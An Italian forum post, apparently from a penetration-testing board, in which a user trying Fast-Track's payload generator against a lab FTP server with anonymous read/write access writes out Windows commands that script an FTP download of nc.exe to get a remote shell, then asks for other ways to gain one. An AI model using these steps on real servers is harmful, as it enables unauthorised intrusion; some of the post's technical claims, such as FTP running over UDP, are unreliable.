### Discussione Spostata ###
Ciao a tutti,
Sto provando ad utilizzare Fast-track tramite interfaccia web.
Ho dato una lettura al wiki ufficiale
trac.thepentest.com/wiki/FastTrack_Tools
per vedere come si usano i vari tools e mi sono soffermato su "Binary to Hex Payload Generator".
Ho pertanto configurato su un altro pc un server FTP IIS6 e utente anonymous R/W.
Istintivamente però ho pensato di copiare nc.exe sul server ftp da windows come segue:
Code:
C:\>echo OPEN 192.168.0.100 >> ftp.txt
echo OPEN 192.168.0.100 >> ftp.txt
C:\>echo GET nc.exe >> ftp.txt
echo GET nc.exe >> ftp.txt
C:\>echo bye >> ftp.txt
echo bye >> ftp.txt
....
C:\>ftp -A -s:ftp.txt
ma non ricevo nessuna shell interattiva.
Bisogna utilizzare ftp.exe di dos che supporta l'opzione "-s" perchè FTP utilizza udp porta 20 e la shell non può essere interattiva.
Ho provato a seguire invece le indicazioni di Fast-Track e di convertire nc.exe in nc.txt.
Mi sono connesso in ftp e ho copiato il contenuto del file direttamente sulla shell.
...e anche così non ottengo nessuna shell..
Sicuramente sbaglio qualcosa io.
Avete qualche suggerimento ?
Esiste un altro modo per ottenere la shell interattiva di un server ftp sfruttando semplicemente il fatto
che l'utente anonymous ha R/W?
Buona giornata
### leggi il regolamento per favore - grazie ###